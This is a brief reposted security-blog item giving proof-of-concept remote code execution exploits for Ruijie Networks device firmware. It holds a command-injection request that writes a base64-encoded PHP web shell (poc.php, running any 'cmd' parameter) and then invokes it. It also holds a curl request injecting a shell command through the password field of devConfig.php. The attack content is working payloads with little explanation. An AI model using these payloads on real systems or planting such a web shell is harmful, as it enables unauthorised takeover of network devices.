Ruijie Networks RCE

admin 2022年7月22日13:26:03评论125 views字数 436阅读1分27秒阅读模式


Ruijie Networks RCE


echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K" | base64 -d POC: POST /guest_auth/guestIsUp.php ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 GET /guest_auth/poc.php?cmd=whoami


Ruijie Networks RCE



Another unauthorized RCE in same firmware PoC: curl http://host/openApi/devConfig.php?a=login -X POST -d "{"admin":"admin","encry":true,"password":"1'; COMMAND ;echo 'a"}"


Ruijie Networks RCE


本文始发于微信公众号(Khan安全攻防实验室):Ruijie Networks RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月22日13:26:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Ruijie Networks RCEhttp://cn-sec.com/archives/534900.html

发表评论

匿名网友 填写信息